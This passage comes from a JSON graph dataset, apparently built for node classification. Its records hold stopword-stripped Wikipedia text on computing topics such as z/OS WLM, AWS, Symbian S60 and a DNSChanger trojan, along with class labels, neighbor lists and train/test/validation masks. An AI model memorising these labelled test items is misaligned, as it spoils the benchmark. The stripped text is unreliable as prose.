access service classes based achieved performance index importance uses collected data project possibility result change change executed forecast comes result beneficial work based defined customer expectations wlm uses data base ranging 20 seconds 20 minutes contain statistically relevant basis samples calculations also one decision interval change performed benefit one service class maintain controlled predictable system wlm controls access work system processors i/o units system storage starts stops processes work execution access system processors example controlled dispatch priority defines relative ranking units work want execute dispatch priority assigned units work classified service class already stated dispatch priority fixed simply derived importance service class changes based goal achievement system utilization demand work system processors similar mechanisms exist controlling system resources way z/os workload manager controlling access work system resources named goal oriented workload management contrast resource entitlement based workload management defines much static relationship work access system resources resource entitlement based workload management found larger unix operating systems example major difference workload management components operating systems close cooperation z/os workload manager major applications middleware subsystems executing z/os wlm offers interfaces allow subsystems tell wlm unit work starts ends system pass classification attributes used system administrator classify work system addition wlm offers interfaces allow load balancing components place work requests best suited system parallel sysplex cluster additional instrumentation exists helps database resource managers signal contention situations wlm wlm help delayed work promoting holder resource locks latches time z/os workload manager became central control component performance related aspects z/os operating system parallel sysplex cluster z/os workload manager components work together provide single image view executing applications cluster system z multiple virtual partitions z/os wlm allows interoperate lpar hypervisor influence weighting z/os partitions control amount cpu capacity consumed logical partitions",
    "neighbors": [
      10212,
      3720,
      7983,
      2168,
      7836
    ],
    "mask": "None"
  },
  {
    "node_id": 7243,
    "label": 3,
    "text": "HP_95LX:hp 95lx hp 95lx palmtop pc f1000a f1010a also known project jaguar hewlett packard first ms-dos-based pocket computer personal digital assistant introduced april 1991 collaboration lotus development corporation seen successor series larger portable pcs like hp 110 hp 110 plus hp 95lx nec v20 cpu intel 8088 clone running 5.37 mhz intel corporation system chip soc device considered completely pc-compatible quarter-cga mda resolution lcd screen ran microsoft ms-dos version 3.22 customized version lotus 1-2-3 release 2.2 built software read-only memory rom included calculator appointment calendar telecommunications program simple text editor also included cr 2032 lithium coin cell memory backup two aa main batteries run mass storage hp 95lx single pcmcia slot could hold static ram card cr 2025 back-up coin cell rs-232-compatible serial port provided well infrared port printing compatible models hewlett packard printers character mode display showed 16 lines 40 characters backlight ibm compatible pcs work hardware code page 437 hp 95lx text mode font hard-wired code page 850 instead lotus 1-2-3 internally used lotus international character set lics characters translated code page 850 display printing purposes successor models hp 95lx include hp 100lx hp palmtop fx hp 200lx hp 1000cx hp omnigo 700lx",
    "neighbors": [
      2179,
      5384,
      3214,
      10768,
      9363,
      1304,
      1660,
      8229,
      7983,
      5681,
      6090,
      9166,
      2383,
      3281,
      2258,
      11100,
      1501,
      1638,
      6765,
      1776,
      5756
    ],
    "mask": "Test"
  },
  {
    "node_id": 7244,
    "label": 6,
    "text": "Volume_(computing):volume computing computer data storage volume logical drive single accessible storage area single file system typically though necessarily resident single partition hard disk although volume might different physical disk drive still accessed operating system logical interface however volume differs partition volume thing partition example floppy disk might accessible volume even though contain partition floppy disks partitioned modern computer software also os recognize partition without recognizing volume associated os interpret filesystem stored situation occurs example windows nt-based oses encounter disks non-microsoft os partitions ext3 filesystem commonly used linux another example occurs intel world extended partition partitions contain filesystem directly instead logical drives aka volumes must created within also case netware volumes residing inside single partition short volumes exist logical os level partitions exist physical media specific level sometimes one-to-one correspondence guaranteed microsoft windows server 2008 onward term volume used superset includes partition well n't uncommon see volume packed single file examples include iso9660 disc images cd/dvd images commonly called isos installer volumes mac os x dmgs volumes files reside within another volume certainly partitions example concerns windows xp system two physical hard disks first hard disk two partitions second one first partition first hard disk contains operating system mount points left defaults example linux systems volumes usually handled logical volume manager enterprise volume management system manipulated using mount 8 nt-based versions microsoft windows volumes handled kernel managed using disk management mmc snap-in diskpart command line tool important note windows nt-based oses single root directory result windows assign least one path mounted volume take one two forms two examples file called track 1.mp3 stored root directory mounted volume could referred codice_2 codice_3 respectively order assign mount point volume path within another volume following criteria must met default windows assign drive letters drives follows legacy convention operating system startup drive still commonly assigned c however always case since personal computers longer include floppies optical disc removable drives typically still start letters b available manual assignment user administrative privileges assignment remembered os pc next time removable volume inserted long conflicts long removable drive reformatted another computer changes volume serial number long os reinstalled computer windows xp mount points may managed disk management snap-in microsoft management console conveniently accessed computer management administrative tools section control panel one drive letter refer single volume using subst command warning removing drive letters mount-points drive may break programs files may accessible known path example program installed \\program files\\some program may expect find data files \\program files\\some program\\data logical disk previously called drive letter changed e program wo n't able find data \\program files\\some program\\data since drive letter longer represents volume unix-like operating systems volumes boot volume mount-point somewhere within filesystem represented path logically directory tree stored volume grafted mountpoint convention mount-points often placed directory called '/mnt though '/media terms sometimes used use given path mount-point another volume empty directory sometimes called folder must exist unix-like operating systems use mount command manipulate mount points volumes example cd-rom drive containing text file called 'info.txt mounted '/mnt/iso9660 text file would accessible '/mnt/iso9660/info.txt files within volume generally moved place within volume manipulating filesystem without moving actual data however file moved outside volume data must relocated much expensive operation order better visualize concept one might consider example large library non-fiction work originally classified subject plants moved subject flora one need refile book whose position shelf would static rather one needs replace index card however move book another library adjusting index cards alone insufficient entire book must moved volume label name given specific volume filesystem fat filesystem volume label traditionally restricted 11 characters reflecting 8.3 restrictions divided name extension fields even long file name enabled stored entry within disk root directory special volume-label attribute bit set also copied 11-byte field within extended bios parameter block disk boot sector label always stored uppercase fat vfat filesystems contain special characters also disallowed regular filenames ntfs filesystem length volume label restricted 32 characters include lowercase characters even unicode label command used change label dos windows os/2 gui systems like windows explorer pressed volume highlighted right-click name bring context menu allows renamed either process renaming file changing label windows also change volume creation timestamp current date time fat filesystems ntfs partitions system volume information directory whose creation timestamp set windows creates partition first recognizes repartitioning creation new volume separate disk utility contrast label volume serial number generally unique normally changed user thus acts consistent reliable identifier volume changed disk removed another inserted disk formatting changes serial number relabeling vol command used command line display current label serial number volume",
    "neighbors": [
      3841,
      1801,
      1291,
      6797,
      3598,
      5391,
      8976,
      2193,
      5397,
      2199,
      6297,
      9762,
      11171,
      8485,
      5158,
      10405,
      11568,
      1844,
      823,
      8254,
      2811,
      3522,
      8911,
      5969,
      5598,
      5221,
      10857,
      6637,
      8301,
      9840,
      2545,
      3826,
      3953,
      3572,
      6641,
      7794,
      9972,
      9593,
      1659,
      6396,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 7245,
    "label": 9,
    "text": "Three-address_code:three-address code computer science three-address code often abbreviated tac 3ac intermediate code used optimizing compilers aid implementation code-improving transformations tac instruction three operands typically combination assignment binary operator example codice_1 name derives use three operands statements even though instructions fewer operands may occur since three-address code used intermediate language within compilers operands likely concrete memory addresses processor registers rather symbolic addresses translated actual addresses register allocation also uncommon operand names numbered sequentially since three-address code typically generated compiler refinement three-address code a-normal form anf three-address code would broken several separate instructions instructions translate easily assembly language also easier detect common sub-expressions shortening code following example one calculation composed several smaller ones three-address code may conditional unconditional jumps methods accessing memory may also methods calling functions may reduce jumps way three-address code may useful control-flow analysis following c-like example loop stores squares numbers 0 9",
    "neighbors": [
      7940,
      1769,
      9391,
      10703,
      2620,
      477
    ],
    "mask": "Train"
  },
  {
    "node_id": 7246,
    "label": 2,
    "text": "S60_(software_platform):s60 software platform s60 platform formerly series 60 user interface software platform smartphones runs top symbian operating system created nokia based 'pearl user interface symbian ltd introduced comdex november 2001 first shipped nokia 7650 smartphone platform since seen 5 updated editions series 60 renamed s60 november 2005 2008 symbian foundation formed consolidate assets different symbian platforms s60 uiq moap making open source 2009 based code base s60 first iteration platform since creation symbian foundation launched s60 5th edition symbian^1 top symbian os 9.4 base subsequent iterations named symbian^2 japanese market symbian^3 s60 software multivendor standard smartphones supports application development java midp c++ python adobe flash api called avkon ui s60 consists suite libraries standard applications telephony personal information manager pim tools helix-based multimedia players intended power fully featured modern phones large colour screens commonly known smartphones originally distinguishing feature s60 phones allowed users install new applications purchase unlike standard desktop platform however built-in apps rarely upgraded vendor beyond bug fixes new features added phones developed rather public release certain buttons standardized menu key four way joystick d-pad left right soft keys clear key s60 mainly used nokia also licensed manufacturers including lenovo lg electronics panasonic samsung sendo siemens mobile sony ericsson solstice vertu sony ericsson notably main vendor using competing uiq symbian interface addition manufacturers community includes four major releases s60 series 60 2001 series 60 second edition 2002 s60 3rd edition 2005 s60 5th edition 2008 release updated version called feature pack sometimes known relay runs different symbian version many devices capable running s60 software platform symbian os devices ranging early nokia 7650 running s60 v0.9 symbian os v6.1 latest samsung i8910 omnia hd running s60 v5.0 symbian os v9.4 symbian^3 version revised platform v5.2 table lists devices carrying version s60 well symbian os version based note new devices since symbian^3 may capable upgrading later systems symbian anna symbian belle therefore may see device listed many systems symbian progressing period organisational change metamorph open source software platform project os symbian os originally provided user interface ui visual layer runs atop operating system implemented separately examples symbian uis moap series 60 series 80 series 90 uiq separation ui underlying os created flexibility confusion market place nokia purchase symbian brokered involvement ui developers major user interface layers pledged donated open source foundation independently symbian operating system new symbian foundation announced intent unify different symbian uis single ui based s60 platform announcements made march 2009 indicated would s60 5th edition feature pack 1 12 april 2011 nokia announced symbian anna software update symbian^3 release three new devices 500 x7 e6 announced symbian anna pre-installed symbian anna available software update symbian^3 based devices well significant updates come anna 24 august 2011 nokia announced symbian belle later renamed nokia belle software update symbian anna release three new devices 603 700 701 nokia 600 cancelled replaced nokia 603 announced symbian belle pre-installed symbian belle available software update symbian anna-based devices well significant updates came belle november 2011 nokia announced carla donna updates carla expected released late 2012 early 2013 feature new web browser new widgets new nfc capabilities dolby surround audio enhancement donna going dual-core processor exclusive planned released late 2013 early 2014 may 2012 nokia executive claimed carla donna cancelled nokia would instead release belle feature pack 2 later 2012 lacking many new features planned carla donna february 2011 nokia announced partnership microsoft adopt windows phone 7 nokia primary operating system leaving symbian development question nokia promised support symbian newer devices least 2016 new symbian devices released nokia 808 pureview 29 april 2011 nokia announce would transfer symbian activities accenture along 3,000 employees symbian belle symbian belle – facts features pictures",
    "neighbors": [
      1537,
      10754,
      11271,
      11277,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      6685,
      4129,
      4132,
      9765,
      40,
      3626,
      5677,
      9262,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      9292,
      1615,
      5201,
      7253,
      3162,
      5211,
      6748,
      4701,
      607,
      1633,
      2658,
      6763,
      109,
      1136,
      8316,
      8829,
      11391,
      6276,
      3205,
      9350,
      11405,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      5290,
      10410,
      7857,
      690,
      5810,
      7866,
      1216,
      1728,
      5824,
      4291,
      7877,
      199,
      11469,
      4305,
      2259,
      6870,
      4311,
      737,
      9443,
      3300,
      4324,
      7399,
      8423,
      8433,
      5369,
      8472,
      11545,
      5406,
      4383,
      11559,
      1833,
      7983,
      821,
      7991,
      7492,
      10053,
      11079,
      6996,
      854,
      10583,
      10080,
      10599,
      6505,
      8554,
      6508,
      2925,
      5998,
      8577,
      11655,
      6539,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      424,
      9137,
      7617,
      967,
      2001,
      487,
      10215,
      3561,
      495,
      1524,
      1533
    ],
    "mask": "Train"
  },
  {
    "node_id": 7247,
    "label": 3,
    "text": "Socket_AM4:socket am4 socket am4 microprocessor socket used amd central processing units cpus built zen including zen+ zen 2 excavator microarchitectures am4 launched september 2016 designed replace sockets am3+ fm2+ fs1b single platform 1331 pin slots first amd support ddr4-compatible memory well achieve unified compatibility high-end cpus previously using socket am3+ amd lower-end apus various sockets am4 socket specifies 4 holes fastening heatsink motherboard placed corners rectangle lateral length 54×90 mm previous sockets 48×96 mm heat sinks older sockets compatible however cooler manufacturers reported offering brackets allowing previously manufactured coolers work am4 coolers redesigned alternatively motherboard makers including am3 am4 cooler mounting holes allowing previous generation coolers used socket am4 currently base 6 chipset models processors socket designed systems chip soc traditional northbridge southbridge board processor motherboard chipset increase number pci express lanes connectivity options connectivity options include nvme sata usb 3.2 gen 2",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      7058,
      10260,
      4246,
      8090,
      2719,
      4767,
      2463,
      7712,
      9122,
      5541,
      1322,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      2764,
      9551,
      7122,
      9427,
      10715,
      7132,
      2525,
      4451,
      5859,
      8035,
      1260,
      1005,
      4334,
      7151,
      1776,
      7788,
      1651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7248,
    "label": 7,
    "text": "Amazon_Web_Services:amazon web services amazon web services aws subsidiary amazon provides on-demand cloud computing platforms individuals companies governments metered pay-as-you-go basis aggregate cloud computing web services provide set primitive abstract technical infrastructure distributed computing building blocks tools one services amazon elastic compute cloud allows users disposal virtual cluster computers available time internet aws version virtual computers emulate attributes real computer including hardware central processing units cpus graphics processing units gpus processing local/ram memory hard-disk/ssd storage choice operating systems networking pre-loaded application software web servers databases customer relationship management crm etc aws technology implemented server farms throughout world maintained amazon subsidiary fees based combination usage hardware/os/software/networking features chosen subscriber required availability redundancy security service options subscribers pay single virtual aws computer dedicated physical computer clusters either part subscription agreement amazon provides security subscribers system aws operates many global geographical regions including 6 north america 2017 aws comprised 90 165 2019 services spanning wide range including computing storage networking database analytics application services deployment management mobile developer tools tools internet things popular include amazon elastic compute cloud ec2 amazon simple storage service amazon s3 services exposed directly end users instead offer functionality apis developers use applications amazon web services offerings accessed http using rest architectural style soap protocol amazon markets aws subscribers way obtaining large scale computing capacity quickly cheaply building actual physical server farm services billed based usage service measures usage varying ways 2017 aws owns dominant 34 cloud iaas paas next three competitors microsoft google ibm 11 8 6 respectively according synergy group aws platform launched july 2002 early stages platform consisted disparate tools services late 2003 aws concept publicly reformulated chris pinkham benjamin black presented paper describing vision amazon retail computing infrastructure completely standardized completely automated would rely extensively web services services storage would draw internal work already underway near end paper mentioned possibility selling access virtual servers service proposing company could generate revenue new infrastructure investment november 2004 first aws service launched public usage simple queue service sqs thereafter pinkham lead developer christopher brown developed amazon ec2 service team cape town south africa amazon web services officially re-launched march 14 2006 combining three initial service offerings amazon s3 cloud storage sqs ec2 aws platform finally provided integrated suite core online services chris pinkham benjamin black proposed back 2003 service offered developers web sites client-side applications companies andy jassy aws founder vice president 2006 said time amazon s3 one first scalable elements aws helps free developers worrying going store data whether safe secure available need costs associated server maintenance whether enough storage available amazon s3 enables developers focus innovating data rather figuring store it. 2016 jassy promoted ceo division reflecting success aws annual compensation 2017 hit nearly 36 million support industry-wide training skills standardization aws began offering certification program computer engineers april 30 2013 highlight expertise cloud computing james hamilton aws engineer wrote retrospective article 2016 highlight ten-year history online service 2006 2016 early fan outspoken proponent technology joined aws engineering team 2008 january 2018 amazon launched autoscaling service aws november 2018 aws announced customized arm cores use servers also november 2018 aws developing ground stations communicate customer satellites november 2010 reported amazon.com retail sites migrated aws prior 2012 aws considered part amazon.com revenue delineated amazon financial statements year industry watchers first time estimated aws revenue 1.5 billion april 2015 amazon.com reported aws profitable sales 1.57 billion first quarter year 265 million operating income founder jeff bezos described fast-growing 5 billion business analysts described surprisingly profitable forecast october 2015 amazon.com said q3 earnings report aws operating income 521 million operating margins 25 percent aws 2015 q3 revenue 2.1 billion 78 increase 2014 q3 revenue 1.17 billion 2015 q4 revenue aws segment increased 69.5 y/y 2.4 billion 28.5 operating margin giving aws 9.6 billion run rate 2015 gartner estimated aws customers deploying 10x infrastructure aws combined adoption next 14 providers 2016 q1 revenue 2.57 billion net income 604 million 64 increase 2015 q1 resulted aws profitable amazon north american retail business first time first quarter 2016 amazon experienced 42 rise stock value result increased earnings aws contributed 56 corporate profits aws 17.46 billion annual revenue 2017 end 2018 number grown 25.65 billion notable customers include nasa obama presidential campaign 2012 netflix 2019 reported 80 germany listed dax companies use aws 2019 aws distinct operations 20 geographical regions 6 north america 1 south america 5 emea 8 asia pacific aws announced 5 new regions coming online hong kong sar bahrain milan cape town jakarta region wholly contained within single country data services stay within designated region region multiple availability zones consist one discrete data centers redundant power networking connectivity housed separate facilities availability zones automatically provide additional scalability redundancy within region since intentionally isolated prevent outages spreading zones several services operate across availability zones e.g. s3 dynamodb others configured replicate across zones spread demand avoid downtime failures december 2014 amazon web services operated estimated 1.4 million servers across 28 availability zones global network aws edge locations consists 54 points presence worldwide including locations united states europe asia australia south america 2014 aws claimed aim achieve 100 renewable energy usage future united states aws partnerships renewable energy providers include community energy virginia support us east region pattern development january 2015 construct operate amazon wind farm fowler ridge iberdrola renewables llc july 2015 construct operate amazon wind farm us east edp renewables north america november 2015 construct operate amazon wind farm us central tesla motors apply battery storage technology address power needs us west northern california region aws also pop-up lofts different locations around world market aws entrepreneurs startups different tech industries physical location visitors work relax inside loft learn aws june 2014 aws opened first temporary pop-up loft san francisco may 2015 expanded new york city september 2015 expanded berlin aws opened fourth location tel aviv march 1 2016 march 22 2016 pop-up loft open london september 10 october 29 2015 2017 aws launched amazon start united kingdom help young adults military veterans retrain technology-related skills partnership prince trust ministry defence mod aws help provide re-training opportunities young people disadvantaged backgrounds former military personnel aws working alongside number partner companies including cloudreach sage edf energy tesco bank",
    "neighbors": [
      0,
      1539,
      6150,
      3082,
      526,
      4623,
      18,
      5139,
      10265,
      5660,
      3614,
      5662,
      5666,
      9766,
      39,
      5159,
      9772,
      6703,
      3121,
      2098,
      5681,
      7733,
      8255,
      5697,
      10820,
      5702,
      4683,
      8269,
      590,
      1102,
      9297,
      5202,
      2134,
      4695,
      4696,
      1628,
      94,
      4194,
      4707,
      5732,
      9314,
      1638,
      9828,
      5737,
      8810,
      6769,
      2163,
      3190,
      5238,
      2170,
      127,
      2689,
      7812,
      10887,
      4236,
      10893,
      4238,
      11410,
      9365,
      2710,
      8346,
      1692,
      6307,
      2212,
      7333,
      11429,
      1704,
      1705,
      2217,
      5800,
      5295,
      8367,
      9906,
      7347,
      7349,
      7352,
      2236,
      3262,
      4289,
      4802,
      6851,
      3269,
      1222,
      1224,
      1740,
      1239,
      2263,
      8921,
      11482,
      2268,
      6365,
      735,
      6367,
      225,
      9449,
      2795,
      3819,
      11502,
      6383,
      1776,
      9974,
      5879,
      7415,
      8439,
      11510,
      3323,
      764,
      1789,
      253,
      8446,
      3328,
      5378,
      8451,
      8962,
      10504,
      265,
      11016,
      11528,
      272,
      11542,
      2328,
      4377,
      2842,
      8475,
      8986,
      3870,
      11038,
      4388,
      10020,
      6438,
      295,
      11556,
      10537,
      6444,
      8495,
      1840,
      3376,
      4400,
      5941,
      11577,
      318,
      11070,
      8515,
      5960,
      8520,
      331,
      4429,
      11597,
      6993,
      1362,
      7507,
      2901,
      7512,
      4954,
      8539,
      2910,
      4958,
      3428,
      10597,
      6504,
      10090,
      8044,
      7022,
      4463,
      368,
      7537,
      5499,
      10110,
      11646,
      6018,
      7043,
      10120,
      6027,
      1421,
      7054,
      911,
      1935,
      8592,
      9104,
      405,
      2965,
      4505,
      3994,
      10140,
      9631,
      929,
      10658,
      11692,
      3502,
      1968,
      9137,
      9655,
      5049,
      10681,
      448,
      2496,
      8128,
      11201,
      8644,
      1480,
      5577,
      10185,
      9682,
      467,
      5587,
      982,
      10200,
      6618,
      9179,
      3042,
      1507,
      6632,
      1001,
      1513,
      8170,
      7660,
      9705,
      11244,
      8181,
      4604,
      2558,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 7249,
    "label": 2,
    "text": "MidnightBSD:midnightbsd midnightbsd free unix-like desktop-oriented operating system originally forked freebsd 6.1 periodically updated code drivers later freebsd releases default desktop environment gnustep borrows heavily nextstep graphical user interface midnightbsd began fork freebsd 2005 founder project lucas holt wished create bsd derived desktop operating system familiar several live cd projects work trueos desktopbsd time also interest gnustep two ideas folded plan create user friendly desktop environment midnightbsd 0.1 released based efforts lucas holt caryn holt d. adam karim phil pereira bsdnexus christian reinhardt release features modified version freebsd ports system ports system evolved mports includes fake support generation packages installation license tagging strict rules package list generation modification files outside destination many features introduced midnightbsd 0.1.1 christian reinhardt replaced phil pereira lead mports maintainer prior release midnightbsd 0.1 d. adam karim acted security officer first release release engineering handled lucas holt 0.2 introduced refined mports system 2000 packages portable c compiler added i386 addition gnu compiler collection changes include enabling ipfw sound card detection startup newer versions many software packages including bind gcc openssh sendmail well live cd creation system currently project focusing finishing magus build cluster software creating new installer finishing new package installation management tools called mport beginning work 0.3 release next release feature enhancements found freebsd 7.0 dragonfly bsd midnightbsd named lucas caryn holt cat midnight midnight ten-pound black turkish angora midnightbsd released several licenses kernel code newly created code released two-clause bsd license parts gpl lgpl isc beerware licenses along three- four-clause bsd licenses jesse smith reviewed midnightbsd 0.6 distrowatch weekly",
    "neighbors": [
      7552,
      7425,
      2179,
      2180,
      1286,
      1927,
      1801,
      10761,
      274,
      5397,
      8725,
      9625,
      1946,
      4636,
      10016,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      3766,
      9784,
      1465,
      5177,
      5819,
      7483,
      3006,
      9151,
      11459,
      9927,
      8266,
      5067,
      8395,
      8909,
      5710,
      6864,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      998,
      4073,
      5356,
      9452,
      8304,
      2545,
      3058,
      5363,
      7027,
      2421,
      8816,
      9201,
      2424,
      1273,
      9844,
      11506,
      9343
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7250,
    "label": 0,
    "text": "Automatic_Complaint-Letter_Generator:automatic complaint-letter generator automatic complaint-letter generator website automatically generates complaint letters website created scott pakin 1994 allows users submit name individual company complaint directed toward program generates complaint letter general enough true fit anyone everyone yet specific enough mean something scott pakin started website april 1994 undergraduate student studying computer science carnegie mellon university began thinking creating program would generate complaint letters idea originated looked pointless ramblings student newspaper pakin criticized letters quality one friends remarked letters sounded arbitrary computer could written pakin pondered comment decided write program would generate complaints website allows users specify name individual company complaint directed toward well number paragraphs complaint submitting data computer generates sentences composed arbitrary verbs nouns adjectives 1995 generator 282 sentence skeletons 170 independent clauses 183 adjectives 123 nouns combination elements form one billion sentences september 2009 generator expanded 3379 independent clauses 618 adjectives 497 nouns complaint letters randomly generated insult different pakin said people read letters inclined pay attention sentences accurate ignored statements obviously wrong noted complaint generator general enough true fit anyone everyone yet specific enough mean something 2001 paul weyland chosen austin toastmasters club present kirk watson mayor austin texas toastmasters member asked weyland speech went automatic complaint-letter generator typed mayor name generator churned four-page complaint letter weyland accidentally emailed mayor even though meant send fellow toastmaster member joke watson learned joke indicated would attending club meeting security issues aide e-mailed weyland said mayor joking meeting weyland apologized mayor fawning introductory speech mayor responded ou know paul rant accused lips planted posteriors drug-addled sycophants 'll notice paul lips attached posterior evening",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7251,
    "label": 4,
    "text": "Trojan.Win32.DNSChanger:trojan.win32.dnschanger trojan.win32.dnschanger trojan win32/dnschanger microsoft malware protection center definition multiple av-labs backdoor trojan due mcafee labs malware variant detected april 19 2009 though microsoft malware protection center knew threat since december 8 2006 dns changer trojans dropped onto systems malware tdss koobface dns-changer-trojan malicious .exe file unable spread accord may therefore perform several actions attacker choice compromised computer changing domain name server dns settings order divert traffic unsolicited potentially illegal and/or malicious domains win32.dnschanger used organized crime syndicates maintain click-fraud moment unaware user browsing activity secretly manipulated altering user clicks seemingly legitimate link forwarded another offered site attackers generate revenues pay-per-click online advertising schemes mostly trojan usually extremely small file +/- 1.5 kilobytes designed change 'nameserver registry key value custom ip address link called ip address encrypted body trojan result change victim device contact newly assigned dns -server resolve names different webservers sometimes randomly f-secure received samples variant named paypal-2.5.200-mswin32-x86-2005.exe case paypal attribution indicates phishing likely trojan programmed change dns server name victim computer ip address 193.227.227.218 registry key affected trojan",
    "neighbors": [
      7809,
      131,
      10756,
      10637,
      895,
      2213,
      2859,
      10166,
      1337,
      9537,
      1994,
      1242,
      7515,
      9055,
      8805,
      107,
      8054,
      507,
      127,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 7252,
    "label": 2,
    "text": "OpenBSD_Cryptographic_Framework:openbsd cryptographic framework openbsd cryptographic framework ocf service virtualization layer uniform management cryptographic hardware operating system part openbsd project included operating system since openbsd 2.8 december 2000 like openbsd projects openssh ported systems based berkeley unix freebsd netbsd solaris linux one linux ports supported intel use proprietary cryptographic software hardware provide hardware-accelerated ssl encryption open source apache http server cryptography computationally intensive used many different contexts software implementations often serve bottleneck information flow increase network latency specialist hardware cryptographic accelerators mitigate bottleneck problem introducing parallelism certain kinds hardware hardware random number generators also produce randomness reliably pseudo-random software algorithm exploiting entropy natural events unlike graphics applications games film processing similar hardware accelerators common use strong operating system support use hardware cryptography relatively low uptake late 1990s need uniform operating system layer mediate cryptographic hardware application software used lack layer led production applications hard-coded work one small range cryptographic accelerators openbsd project history integrating strong carefully audited cryptography operating system core produced framework provision cryptographic hardware acceleration operating system service application-level support provided pseudo-device provides access hardware drivers standard ioctl interface simplifies writing applications removes need application programmer understand operational details actual hardware used openbsd implementation ipsec packet-level encryption protocol altered packets decoded batches improves throughput one rationale maximize efficiency hardware usage—larger batches reduce bus transmission overhead—but practice ipsec developers found strategy improves efficiency even software implementations many intel firmware hubs i386 motherboards provide hardware random number generator possible facility used provide entropy ipsec openssl uses ocf systems hardware supports rsa dh dsa cryptographic protocols automatically use hardware without modification software 11 december 2010 former government contractor named gregory perry sent email openbsd project leader theo de raadt alleging fbi paid openbsd ex-developers 10 years previously compromise security system inserting number backdoors side channel key leaking mechanisms ocf theo de raadt made email public 14 december forwarding openbsd-tech mailing list suggested audit ipsec codebase de raadt response skeptical report invited developers independently review relevant code weeks followed bugs fixed evidence backdoors found oracle proprietary operating system solaris originally developed sun features unrelated product called solaris cryptographic framework plug-in system cryptographic algorithms hardware",
    "neighbors": [
      865,
      8065,
      11487,
      11678,
      4071,
      10631,
      8266,
      9196,
      823,
      10908,
      3742,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 7253,
    "label": 2,
    "text": "Series_90_(software_platform):series 90 software platform series 90 formerly hildon platform mobile phones uses symbian os developed nokia collaboration psion released 2003 going platform nokia 7700 cancelled eventually make market nokia 7710 nokia discontinued series 90 platform merged technology s60 although one production series 90 device made form gui continued nokia hildon user interface maemo shipped nokia internet tablets series 90 completely incompatible series 60 s60 uiq popular platforms symbian smartphones however applications nokia series 80 communicator devices – nokia 9300 – function series 90 essentially series 90 development psion eikon gui used series 5 series 5mx revo netpad series 7 netbook machines modified controlled entirely touchscreen supplemented 77x0 seven hardware buttons rocker-dial nokia 7700 never released on-screen keyboard text input 7710 added basic handwriting recognition applications single menu tree accessible title bar top screen exit quit option apps button bar added right hand side screen resembling nokia communicator smartphones",
    "neighbors": [
      1537,
      10754,
      11271,
      11277,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      4132,
      40,
      3626,
      9262,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      9292,
      7246,
      1615,
      5201,
      3162,
      5211,
      6748,
      607,
      1633,
      2658,
      6763,
      109,
      8315,
      8316,
      8829,
      11391,
      6276,
      3205,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      5290,
      10410,
      3248,
      7857,
      7866,
      1216,
      1728,
      5824,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      9443,
      3300,
      4324,
      7399,
      8423,
      8433,
      5369,
      4364,
      8472,
      11545,
      5406,
      4383,
      7983,
      821,
      7991,
      7492,
      10053,
      11079,
      6996,
      854,
      10583,
      10080,
      10599,
      6505,
      6508,
      2925,
      5998,
      8577,
      11655,
      1424,
      2449,
      8083,
      7063,
      5019,
      4003,
      7617,
      967,
      2001,
      3542,
      10215,
      3561,
      495,
      1524,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 7254,
    "label": 6,
    "text": "Fast_Virtual_Disk:fast virtual disk fast virtual disk better known fvd virtualization-oriented disk image file format developed ibm qemu virtualization platform differs existing paravirtualization-centric virtual disk image formats design emphasizes lack contention separation concerns host guest kernels duduplication filesystem block layer storage management fvd written either directly physical logical blockstore avoiding host filesystem overheads regular host file system file strives maintain similarity raw disk layouts eliminate host filesystem disk image compression overheads minimize metadata-related overheads",
    "neighbors": [
      10857,
      10476,
      9874,
      823,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 7255,
    "label": 5,
    "text": "Cleancode_eMail:cleancode email cleancode email also known cleancode email simply email simple command line software utility sending smtp email portable enough compile run linux os x bsd solaris cygwin perhaps unix-like operating systems upon installing cleancode email codice_1 executable binary becomes available program offers features sending email via smtp supports smtp auth via login plain mechanisms mime attachments address book encryption transport via tls message via pgp digital signatures via pgp easily used sending email command line via shell scripts software packages lack modern features helps cleancode email stand fast efficient helpful tool system administrators unix-like environments intentional purpose first developed cleancode email started september 2001 currently still maintained developed original author dean jones",
    "neighbors": [
      1664,
      9986,
      3465,
      9747,
      11418,
      9642,
      1075,
      2101,
      9909,
      823,
      9542,
      3015,
      10956,
      6231,
      9451,
      10861,
      9459,
      5492,
      3578,
      8443,
      7036
    ],
    "mask": "Test"
  },
  {
    "node_id": 7256,
    "label": 7,
    "text": "Spread_Toolkit:spread toolkit spread toolkit computer software package provides high performance group communication system resilient faults across local wide area networks spread functions unified message bus distributed applications provides highly tuned application-level multicast group communication point point support spread services range reliable messaging fully ordered messages delivery guarantees toolkit consists messaging server client libraries many software development environments including c/c++ libraries without thread support java class used applets applications interfaces perl python ruby interfaces many software environments provided third parties typical operation computer cluster runs instance spread server client applications connect locally server process spread servers turn communicate pass messages subscriber applications also configured clients distributed across network communicate spread server process one host spread toolkit developed spread concepts llc much support distributed systems networks lab dsn johns hopkins university experimental networked systems lab george washington university partial funding provided defense advanced research projects agency darpa national security agency nsa bindings spread toolkit exist many languages platforms",
    "neighbors": [
      8640,
      10083,
      3876,
      8644,
      8582,
      4777,
      8554,
      428,
      1197,
      5612,
      5677,
      7887,
      7983,
      9245,
      692,
      1049,
      6522,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7257,
    "label": 4,
